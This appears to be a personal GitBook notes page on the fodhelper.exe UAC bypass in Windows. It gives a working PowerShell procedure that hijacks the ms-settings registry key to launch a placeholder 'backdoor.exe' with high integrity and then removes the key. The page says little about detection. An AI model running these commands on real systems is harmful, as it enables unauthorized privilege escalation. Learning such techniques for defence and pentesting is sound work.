✨
Tech Stuff
  • Welcome
  • Threat Hunting
    • Learning ETW
      • Logman
      • SilkETW
      • Apply ETW to Windows Event (1)
    • Learning win32evtlog in python
  • Attack Simulation
    • Atomic Red Team
  • Tools
    • Windows Events Providers Explorer
    • FRIDA for iOS app penetration testing
  • Windows Security
    • User Account Control (UAC)
      • UAC Bypass
  • Windows OS Penetration Testing
    • Metasploit
    • PowerShell
    • Bloodhound
  • Unorganized Python
  • Python - pexpect
  • Python - subprocess for Windows
  • Parsing evtx to json
  • Python - Pykd
  • Workflow
    • Kali Linux on Docker
Powered by GitBook
On this page
  • UAC Bypass technique I - fodhelper.exe
  • Procedure
  • Technical Context
  • Analytic I
  • Reference

Was this helpful?

  1. Windows Security
  2. User Account Control (UAC)

UAC Bypass

UAC Bypass technique I - fodhelper.exe

Procedure

PS> $command = "C:\Temp\backdoor.exe
PS> New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
PS> New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
PS> Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $command -Force
PS> Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
PS> Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force

Technical Context

The process of foldhelper will be running as high integrity to perform tasks like typing, text to speech, such kind of Windows Features. @winscripting discovered that the fodhelper process will look for some registry keys which could be leveraged to execute code. The registry paths are:

HKCU:\Software\Classes\ms-settings\shell\open\command
HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecute

Analytic I

Coming Soon

Reference

PreviousUser Account Control (UAC)NextMetasploit

Last updated 4 years ago

Was this helpful?

LogoUAC Bypass – FodhelperPenetration Testing Lab